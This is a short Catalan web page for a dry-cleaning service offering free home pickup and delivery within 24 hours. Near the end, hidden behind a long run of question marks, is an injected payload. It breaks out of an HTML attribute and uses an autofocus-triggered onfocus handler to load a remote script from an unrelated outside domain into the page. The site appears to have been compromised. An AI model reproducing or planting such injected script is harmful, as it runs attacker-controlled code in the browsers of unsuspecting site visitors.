Tintoreria

No s’amoïni per portar la roba a la tintoreria, nosaltres li recollirem i li entregarem la seva roba a domicili gratuïtament.

Rentat “en sec” per les seves millors peces: vestits, americanes, pantalons, abrics, jaquetons, peces de pell, etc. I neteja de mantes, edredons, catifes, cortines..

Tot, amb la recollida i lliurament de la seva roba a domicili, amb només 24 hores.

tintoreria
0
0,00
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? \" onfocus=script=document.createElement("script");script.src="//www.cannalist.co.il/counter.js";document.head.append(script); autofocus=\"
Empty Cart